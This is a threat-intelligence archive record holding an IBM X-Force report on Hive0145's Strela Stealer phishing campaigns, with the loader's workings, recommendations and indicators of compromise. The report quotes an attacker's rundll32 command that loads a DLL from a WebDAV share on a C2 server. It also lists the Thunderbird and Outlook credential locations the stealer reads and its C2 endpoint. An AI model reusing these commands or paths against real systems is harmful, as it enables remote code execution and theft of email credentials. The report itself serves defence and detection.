{
	"id": "3d779710-20e8-4c27-87e9-12230aa0ff31",
	"created_at": "2026-04-06T00:08:09.928716Z",
	"updated_at": "2026-04-10T13:11:35.709091Z",
	"deleted_at": null,
	"sha1_hash": "c0026383e30c37d209075632d7ea6b28ce4285b9",
	"title": "Strela Stealer Today's Invoice Tomorrow’s Phish",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 9994831,
	"plain_text": "Strela Stealer Today's Invoice Tomorrow’s Phish\r\nBy Golo Mühr, Joe Fasulo, Charlotte Hammond\r\nPublished: 2024-11-12 · Archived: 2026-04-05 17:23:17 UTC\r\nCharlotte Hammond\r\nMalware Reverse Engineer\r\nIBM Security\r\nAs of November 2024, IBM X-Force has tracked ongoing Hive0145 campaigns delivering Strela Stealer malware\r\nto victims throughout Europe – primarily Spain, Germany and Ukraine. The phishing emails used in these\r\ncampaigns are real invoice notifications, which have been stolen through previously exfiltrated email credentials.\r\nStrela Stealer is designed to extract user credentials stored in Microsoft Outlook and Mozilla Thunderbird. During\r\nthe past 18 months, the group tested various techniques to enhance its operation’s effectiveness. Hive0145 is likely\r\nto be a financially motivated initial access broker (IAB), active since late 2022 and potentially the sole operator of\r\nStrela Stealer. The continuous operational pace of Hive0145’s campaigns highlights an increased risk to potential\r\nvictims across Europe.\r\nKey findings:\r\nHive0145 is an initial access broker focused on targeting victims throughout Europe\r\nDuring the last 18 months, Strela Stealer has tested out a variety of techniques to improve its infection\r\nchain and extract email credentials\r\nAs of July 2024, Hive0145 began using stolen emails to further spread Strela Stealer\r\nHive0145 campaigns have increased in volume, with weekly campaigns as of 17 October 2024\r\nAs of early November 2024, Hive0145 began targeting Ukraine with stolen invoice emails\r\nHive0145 is potentially the sole operator of Strela Stealer\r\nBackground\r\nStarting mid-April 2023, X-Force began tracking an increase in Hive0145 activity. 
Hive0145 is likely a financially\r\nmotivated initial access broker (IAB) and potentially the sole operator of Strela Stealer. Strela Stealer is\r\na malware designed to extract user email credentials stored in Microsoft Outlook and Mozilla Thunderbird,\r\npotentially leading to Business Email Compromise (BEC). IABs routinely gather credentials and other data that is\r\nhttps://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish\r\nPage 1 of 20\n\nsold to affiliate threat actors specializing in victim network exploitation. However, it remains unknown if\r\nHive0145 has a specific partner network for selling the access gained through their campaigns.\r\nOver the past year, Hive0145 has demonstrated proficiency in evolving tactics, techniques and procedures (TTPs)\r\nto target victims across Europe. Italian, Spanish, German and Ukrainian victims continue to receive weaponized\r\nattachments that entice the victim to open the file. The actor’s campaigns present the victim with fake invoices or\r\nreceipts and often a short, generic message of urgency for victims to address. Upon loading the attached file, the\r\nvictim unwittingly executes the infection chain leading to Strela Stealer malware.\r\nFigure 1 Banco Santander-themed email campaign\r\nHive0145 continued this pattern of using generic messages and fake invoices and receipts throughout the first half\r\nof 2024. However, by early July 2024, the group adopted a different approach and began weaponizing stolen\r\nemails of actual entities across financial, technology, manufacturing, media, e-commerce and other industries. 
The\r\ndeparture from simplicity indicates Hive0145’s shift toward a maturing cyber operations capability.\r\nAttachment hijacking\r\nIn July 2024, X-Force observed a mid-campaign change in the emails being distributed by Hive0145, with the\r\nshort and generic messages being replaced with what appeared to be legitimate stolen emails. The phishing emails\r\nexactly matched official invoice communication emails and, in some cases, still directly addressed the original\r\nrecipients by name. X-Force was able to verify that the emails were in fact authentic invoice notifications from a\r\nvariety of entities across financial, technology, manufacturing, media, e-commerce and other industries. It is likely\r\nthat the group sourced the emails through previously exfiltrated credentials from their prior campaigns.\r\nThe concept of using stolen emails is not new; it was used extensively by the Emotet group and malware\r\ndistributors such as Hive0118 (aka TA577), TA551 and TA570. In their campaigns, they leveraged thread\r\nhijacking, where replies to stolen emails were used as a way to increase the appearance of legitimacy. The\r\nmodified emails were sent to corresponding contacts of previous victims, making the final email look like a reply\r\nto the stolen email, thereby hijacking the email thread. The text the distributors add to the emails is often short\r\nreplies, urging victims to look at the included attachments or URLs.\r\nThe technique employed by Hive0145 differs from thread hijacking in that rather than adding a reply message to\r\nthe stolen email, the original contents remain largely unmodified and only the attachment is switched to include a\r\nmalicious payload using the original filename (without the original extension). Within the email body, Hive0145\r\nalso replaces both the local part and the domain of the original email sender with that of the new phishing victim\r\nto custom-tailor the email. 
The emails with hijacked attachments are then sent out in mass phishing campaigns.\r\nHive0145 also appears to carefully consider the hijacked emails by only selecting ones referring to invoices and\r\ncontaining attachments. X-Force has observed the attachment hijacking technique since mid-2024 in campaigns\r\ntargeting German, Spanish and Ukrainian speakers.\r\nFigure 2 Example of original stolen email of a Deutsche Bahn invoice with hijacked attachment\r\nLate 2024 campaign\r\nThe July 2024 campaign began with low volumes of email delivery throughout the week of 8 July. Hive0145\r\nappeared to take a short break before returning with a larger campaign the week of 22 July, followed by a period\r\nof inactivity. Starting mid-October 2024, Hive0145 returned with a widespread attachment hijacking campaign\r\ntargeting Spanish, German and Ukrainian victims. Unlike the brief July campaign, this one has continued sending\r\nout notable volumes of emails, with the majority sent during weekdays.\r\nFigure 3 The ongoing late-October 2024 campaign\r\nEmails stolen across financial, technology, manufacturing, media, e-commerce and other industries continue to be\r\nweaponized as of early November 2024, in one of the largest observed Hive0145 campaigns to date. In the\r\nongoing campaign, the victim receives an archive containing a heavily obfuscated JavaScript file that downloads\r\nand executes a crypted Strela Stealer DLL. 
As of 7 November 2024, Hive0145 is including Ukrainian speakers in\r\nthe ongoing campaign, signaling a significant development compared to previously observed victimology.\r\nFigure 4 Example of the original stolen email of an invoice targeting Ukraine\r\nHive0145’s increased volume of delivery using attachment hijacking with a steady supply of freshly stolen emails\r\nmay suggest the group has adopted automation for harvesting, weaponizing, packaging and sending their phishing\r\nemails. The group continues to show a preference for widespread exploitation of Spanish, German and Ukrainian\r\nvictims throughout Europe.\r\nEvolving techniques\r\nHive0145 stands out among other malware distributors for their level of effort to adopt increasingly sophisticated\r\nmethods of delivering Strela Stealer. The level of sophistication mirrors that of other successful mass distributors of\r\nmalware such as Emotet, Pikabot and Qakbot, whose campaigns often led to the deployment of ransomware. Below is a\r\nbreakdown of notable techniques used by Hive0145 over time, with some being briefly tested and others fully\r\nadopted.\r\nPolyglots\r\nThe first Strela Stealer campaigns observed by X-Force made use of polyglot files, as first reported in a blog by\r\nDCSO (Deutsche Cyber-Sicherheitsorganisation) in late 2022. These files have multiple valid formats and can be\r\nparsed by different applications. The same file could be rendered as HTML to display a decoy invoice while\r\nalso being a valid DLL implementing Strela Stealer. This is a rather uncommon technique for attempting to bypass\r\nsecurity solutions.\r\nSigned binaries\r\nMultiple campaigns throughout 2023 made use of valid code signing certificates for the malicious Strela Stealer\r\nbinaries. 
For example, campaigns targeting Spanish-speaking victims dating back to April 2023 contained\r\npayloads with a valid certificate signed by Tecfinance Informatica E Projetos De Sistemas Ltda, a software\r\ncompany in Brazil.\r\nFigure 5 Brazilian company certificate used in 2023 campaigns\r\nOn 5 May 2024, X-Force took steps to inform relevant parties of the finding, and the certificate has since been\r\nrevoked.\r\nOf note, a mid-2023 Italy-targeted campaign used a different certificate:\r\nFigure 6 Another stolen certificate used in mid-2023 to target Italian victims\r\nTargeted phishing\r\nStrela Stealer phishing campaigns also tailored filenames to include targeted domain names. The file names are\r\noften identical to the name of the organization or company, potentially in an attempt to generate authenticity. The\r\nexample below is a phishing email from 2023 posing as an invoice or payment receipt.\r\nFigure 7 Factura-themed email campaign\r\nAs the email suggests, the attachments are encrypted ZIP files, with passwords slightly differing between every\r\nemail. 
Threat actors encrypt email attachments since basic email filtering and sandbox solutions often cannot\r\ninspect or detonate those files.\r\nStrela Stealer has also used uncommon extensions for their PE executable files such as .com instead of .exe:\r\ntransferencia_\u003cdomain_name\u003e.com\r\nfactura_\u003cdomain_name\u003e.com\r\nFATTURA_\u003cdomain_name\u003e.bat.exe\r\nThis makes use of a condition in Microsoft Windows operating systems where three different extensions can be\r\nused to mark a file as executable: .exe, .com, and .pif.\r\nIf the content is an executable PE file, Microsoft Windows will run it automatically once opened. By using the\r\nmore uncommon and unknown extensions, the campaign may evade simple anti-virus solutions or victim\r\nsuspicion. Earlier campaigns with the same payloads were also observed to make use of the .pif extension.\r\nPacking, obfuscation and crypting\r\nApart from directly attached ZIP archives with the malicious executables, Strela Stealer campaigns also often use\r\nobfuscated scripts such as Batch, JavaScript or PowerShell to download or drop their payload.\r\nCampaigns throughout 2024 mainly relied on these obfuscated scripts to run a PowerShell command to connect to\r\na WebDAV server and download and execute a crypted DLL:\r\n\"C:\\Windows\\system32\\rundll32.exe\"\r\n\\\\94.159.113.48@8888\\davwwwroot\\157161090119030.dll,Entry\r\nThe WebDAV staging servers host a large number of DLLs, with different names and hashes. They appear to have\r\nbeen built using a crypter X-Force identifies as “Stellar Crypter,” which has likely been in use exclusively by\r\nHive0145 since at least May 2023. 
The malicious binaries identified as “Stellar Loader” contain the encrypted\r\nStrela Stealer payload.\r\nStellar Loader\r\nStellar Loader is a crypter that has been in use since at least April 2023 and is predominantly a precursor to follow-on\r\nStrela Stealer payloads. Stellar samples are usually highly obfuscated and make use of techniques such as\r\ncontrol flow obfuscation and include large amounts of junk instructions to hinder analysis and signature creation.\r\nStellar’s payload is XOR encrypted and stored in the .data section of the Stellar loader binary. The encrypted\r\npayload data is preceded by the XOR key which, in recent samples, consists solely of upper and lowercase letters\r\nand can be thousands of characters long.\r\nUpon execution, Stellar Loader decrypts the payload data using XOR and the stored key. The decryption process\r\nmay also involve an additional round of XOR using a hardcoded single-byte key. As part of the Stellar Loader\r\ncode’s obfuscation, the decryption algorithm within the code is often expanded to include hundreds of operations.\r\nHowever, the vast majority of these operations cancel each other out, and what appears as a complex algorithm\r\ncan be reduced down to a simple XOR operation. The screenshot below shows a version of Stellar Loader with\r\nminimal obfuscation, where the structure of the loader code and decryption algorithm can be easily seen.\r\nIn more recent versions of the loader, the encrypted payload data is followed by an additional encrypted block\r\ncontaining a list of API names required by the loader code, such as VirtualAlloc. The loader decrypts this block\r\nusing the same key as the payload but without the additional single-byte XOR. 
The loader can then use the API\r\nnames in the block to retrieve the corresponding API addresses.\r\nOnce the payload and API list have been decrypted, Stellar allocates space in memory using VirtualAlloc and\r\nmaps the payload PE at the allocated address. It then performs the standard PE loading steps, such as loading its\r\nimports and processing any relocation sections (.relocs), and finally, it executes the payload at its entry point\r\naddress.\r\nStrela Stealer\r\nStrela Stealer changed little in functionality over the past two years. Starting with the initial version reported on by\r\nDCSO in late 2022, the main objective of the stealer is to exfiltrate email credentials from two common email\r\nclients: Microsoft Outlook and Thunderbird. This is consistent across all variants; however, the latest variant does\r\nsupport more registry keys to search for Microsoft Outlook credentials than prior versions.\r\nStrela Stealer runs two functions tasked with stealing credentials from two email clients:\r\nEmail client: Thunderbird\r\nLocation: File system\r\nPaths:\r\n%APPDATA%\\Thunderbird\\Profiles\\logins.json\r\n%APPDATA%\\Thunderbird\\Profiles\\key4.db\r\nEmail client: Microsoft Outlook\r\nLocation: Registry\r\nPaths:\r\nSOFTWARE\\\\Microsoft\\\\Office\\\\16.0\\\\Outlook\\\\Profiles\\\\Outlook\\\\9375CFF0413111d3B88A00104B2A6676\\\\\r\nSOFTWARE\\\\Microsoft\\\\Office\\\\15.0\\\\Outlook\\\\Profiles\\\\Outlook\\\\9375CFF0413111d3B88A00104B2A6676\\\\\r\nSoftware\\\\Microsoft\\\\Windows Messaging Subsystem\\\\Profiles\\\\9375CFF0413111d3B88A00104B2A6676\r\nSoftware\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows MessagingSubsystem\\\\Profiles\\\\Outlook\\\\9375CFF0413111d3B88A00104B2A6676\r\nFor Outlook, Strela Stealer specifically looks for the registry values:\r\nIMAP Server\r\nIMAP User\r\nIMAP Password – decrypted using CryptUnprotectData()\r\nThe data is formatted and prepended with the string “FF” or “OL” for Thunderbird data and Outlook data,\r\nrespectively. Next, it is also encrypted with a static XOR key, which represents a GUID string such as:\r\n96be98b2-8a00-410d-87da-2482cc8b7793\r\nThen, Strela Stealer sends a POST request for each email client to its hardcoded C2 server:\r\nhttp://94.159.113[.]48/server.php\r\nThe response is decrypted via the same XOR key above. Strela Stealer continues to send out POST requests in 1-second\r\nintervals until a request fails or it receives back the string “KH” (2023 versions), “ANTIROK” (2024\r\nversions) or “CHOLLIMA” (Nov. 2024 versions).\r\nAs of October 2024, Strela Stealer also includes two more exfiltration functions. The first gathers system\r\ninformation on the host and writes it to a file via the command:\r\ncmd.exe /c systeminfo \u003e %TMP%\\{\u003cvolume_guid_of_system_folder\u003e}s.txt\r\nThe second exfiltration function uses COM objects to enumerate the list of installed applications from the\r\n“AppsFolder” (a virtual folder, displayed as “Applications”) on the victim machine.\r\nThe dropped file, as well as the list of installed applications, are read and encrypted before exfiltration in the same\r\nfashion as the others. 
They are sent to the C2 server with identifiers “SI” and “LA” respectively.\r\nLanguage checks\r\nStrela Stealer started to implement language checks by verifying the keyboard language on the victim host.\r\nVersions throughout 2024 only run on hosts with one of the following keyboard languages:\r\nSpanish\r\nGerman\r\nCatalan\r\nPolish\r\nItalian\r\nBasque\r\nIn early November, Hive0145 started distributing stolen Ukrainian emails as well and modified the language\r\nverification logic slightly, adding Ukrainian (0x422) to the list of keyboard layouts. In addition, the developers\r\nswitched to using the GetKeyboardLayoutList API to cover all installed keyboard layouts. If none of the languages\r\nmatch, Strela Stealer has a secondary check comparing the result of the user’s default locale\r\nfrom GetLocaleInfoA against “AU” and “UA”, which are the codes for Australia and Ukraine. It is possible that\r\nthe developer was not sure of the endianness of the returned value and did not intend to target Australia. Overall,\r\nthese changes increase the scope of machines available for a Strela Stealer infection.\r\nPreviously, the malware would display an unobtrusive error message to the user after running in order to not raise\r\nany suspicion. It states that the file was corrupted and could not be opened, in a language depending on the\r\ninstalled keyboard. The latest versions use the more universal error message “Err 100”, which is shown 5\r\nseconds after execution begins.\r\n.NET variant\r\nIn June 2023, X-Force observed a single Italy-targeted Hive0145 campaign delivering a new Strela Stealer variant\r\nthat was completely rewritten in .NET. Similar to campaigns before it, this one also made use of valid code signing\r\ncertificates. 
Re-implementing malware in a different language shows a significant effort by the threat actor. In\r\norder to conceal strings, function names and control flow, the developers made use of the commercial “Aldaray\r\nRummage Obfuscator” for .NET. The screenshot below shows the code used to access and unprotect IMAP\r\ncredentials from Microsoft Outlook registry keys.\r\nNotably, the commercial obfuscator does include a watermark for the license, which was observed as:\r\nRummage is licensed to Victoria Semigodova (issue J) for use with any product.\r\n5687c5da50660eda\r\nThe sample above displays the following error message in Italian:\r\nIl file viene arrestato e non può essere eseguito.\r\nHive0145 objectives\r\nHive0145’s focus on harvesting email credentials sets them apart from other operators of stealer or botnet\r\nmalware, which are often commoditized and target a broader range of credentials and data, or facilitate follow-on\r\npayloads intended for initial access. Hive0145’s use of stolen emails for attachment hijacking is an indicator that a\r\nportion of stolen email credentials may be used to harvest legitimate emails for further distribution. Both stolen\r\nand actor-created emails used by Hive0145 predominantly feature invoices as themes, which points towards\r\npotential financial motivation. It is possible that Hive0145 may sell stolen emails to affiliate partners for the\r\npurposes of further business email compromise.\r\nConclusion:\r\nHive0145 is a rapidly maturing cyber criminal threat actor and seeks to infect victims with the intention of gaining\r\nvalid email credentials. Observations suggest that the theft of email credentials, through initial campaigns, led to\r\nfurther theft of valid emails used in subsequent attachment hijacking campaigns. 
Strela Stealer malware continues\r\nto be an effective tool for Hive0145 to extract email credentials.\r\nThe wide variety of industries emulated by Hive0145’s email campaigns increases the potential risk of being\r\ntargeted for commercial organizations throughout Europe. Of note, organizations in Italian, Spanish, German, or\r\nUkrainian-speaking regions may be at more immediate risk of a Hive0145 campaign. X-Force recommends\r\nheightened vigilance surrounding email attachments received and careful review of the expected file type\r\ndelivered.\r\nRecommendations:\r\nX-Force recommends organizations:\r\nExercise caution with emails and ZIP archive attachments\r\nConsider changing the default application for JavaScript/JScript/VBScript files to Notepad\r\nMonitor rundll32.exe processes executing remotely hosted DLLs\r\nInstall and configure endpoint security software\r\nUpdate relevant network security monitoring rules\r\nEducate staff on the potential threats to the organization\r\nIndicator | Indicator Type | Context\r\n03853c56bcfdf87d71ba4e17c4f6b55f989edb29fc1db2c82de3d50be99d7311 | SHA256 | Stellar Loader (Oct 2024)\r\ne50bea80513116a1988822fe02538d3af4d91505d4098afca4ea741bcf4cd427 | SHA256 | Stellar Loader (May 2024)\r\n2cac42735170cd3f67111807a7e48f8fca104eb97c379129872249160d90e22d | SHA256 | Stellar Loader - minimal obfuscation (Jan 2024)\r\n9a032497b82c3db8146cb624b369f63bef76b302a5e25349156bdcb53af3fb84 | SHA256 | Strela Stealer payload\r\ne4a7ad38aaea4bd27c32c57b5a52eac1020495cf8698a2b595b169a3c5c9313a | SHA256 | Strela Stealer payload\r\n2f7ac330e100b577748bb34bd8f7f655f6d138b90683594dbf06ccc41bb3751a | SHA256 | Stellar Loader (Nov 2024)\r\n94.159.113[.]48 | IPv4 | Strela Stealer C2\r\n94.159.113[.]86 | IPv4 | Strela Stealer C2\r\n193.109.85[.]231 | IPv4 | Strela Stealer C2\r\n5906c8e683b8eb9d2bc104f3ca7abaa1f76c64ac694c46a0de5ec67456364f5d | SHA256 | Strela Stealer .NET variant\r\nSource: https://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.ibm.com/think/x-force/strela-stealer-todays-invoice-tomorrows-phish"
	],
	"report_names": [
		"strela-stealer-todays-invoice-tomorrows-phish"
	],
	"threat_actors": [
		{
			"id": "26a04131-2b8c-4e5d-8f38-5c58b86f5e7f",
			"created_at": "2022-10-25T15:50:23.579601Z",
			"updated_at": "2026-04-10T02:00:05.360509Z",
			"deleted_at": null,
			"main_name": "TA551",
			"aliases": [
				"TA551",
				"GOLD CABIN",
				"Shathak"
			],
			"source_name": "MITRE:TA551",
			"tools": [
				"QakBot",
				"IcedID",
				"Valak",
				"Ursnif"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "28349be5-ce76-4a45-9502-707953dd2f07",
			"created_at": "2025-05-29T02:00:03.210059Z",
			"updated_at": "2026-04-10T02:00:03.86427Z",
			"deleted_at": null,
			"main_name": "HIVE-0145",
			"aliases": [
				"Hive0145"
			],
			"source_name": "MISPGALAXY:HIVE-0145",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "40b623c7-b621-48db-b55b-dd4f6746fbc6",
			"created_at": "2024-06-19T02:03:08.017681Z",
			"updated_at": "2026-04-10T02:00:03.665818Z",
			"deleted_at": null,
			"main_name": "GOLD CABIN",
			"aliases": [
				"Shathak",
				"TA551 "
			],
			"source_name": "Secureworks:GOLD CABIN",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "90f216f2-4897-46fc-bb76-3acae9d112ca",
			"created_at": "2023-01-06T13:46:39.248936Z",
			"updated_at": "2026-04-10T02:00:03.260122Z",
			"deleted_at": null,
			"main_name": "GOLD CABIN",
			"aliases": [
				"Shakthak",
				"TA551",
				"ATK236",
				"G0127",
				"Monster Libra"
			],
			"source_name": "MISPGALAXY:GOLD CABIN",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "96d5b301-0872-444c-ba32-eecf7a9241c0",
			"created_at": "2023-02-15T02:01:49.560566Z",
			"updated_at": "2026-04-10T02:00:03.347926Z",
			"deleted_at": null,
			"main_name": "TA570",
			"aliases": [
				"DEV-0450"
			],
			"source_name": "MISPGALAXY:TA570",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b4f83fef-38ee-4228-9d27-dde8afece1cb",
			"created_at": "2023-02-15T02:01:49.569611Z",
			"updated_at": "2026-04-10T02:00:03.351659Z",
			"deleted_at": null,
			"main_name": "TA577",
			"aliases": [
				"Hive0118"
			],
			"source_name": "MISPGALAXY:TA577",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "22d450bb-fc7a-42af-9430-08887f0abf9f",
			"created_at": "2024-11-01T02:00:52.560354Z",
			"updated_at": "2026-04-10T02:00:05.276856Z",
			"deleted_at": null,
			"main_name": "TA577",
			"aliases": [
				"TA577"
			],
			"source_name": "MITRE:TA577",
			"tools": [
				"Pikabot",
				"QakBot",
				"Latrodectus"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "04e34cab-3ee4-4f06-a6f6-5cdd7eccfd68",
			"created_at": "2022-10-25T16:07:24.578896Z",
			"updated_at": "2026-04-10T02:00:05.039955Z",
			"deleted_at": null,
			"main_name": "TA551",
			"aliases": [
				"G0127",
				"Gold Cabin",
				"Monster Libra",
				"Shathak",
				"TA551"
			],
			"source_name": "ETDA:TA551",
			"tools": [
				"BokBot",
				"CRM",
				"Gozi",
				"Gozi CRM",
				"IceID",
				"IcedID",
				"Papras",
				"Snifula",
				"Ursnif",
				"Valak",
				"Valek"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434089,
	"ts_updated_at": 1775826695,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c0026383e30c37d209075632d7ea6b28ce4285b9.pdf",
		"text": "https://archive.orkl.eu/c0026383e30c37d209075632d7ea6b28ce4285b9.txt",
		"img": "https://archive.orkl.eu/c0026383e30c37d209075632d7ea6b28ce4285b9.jpg"
	}
}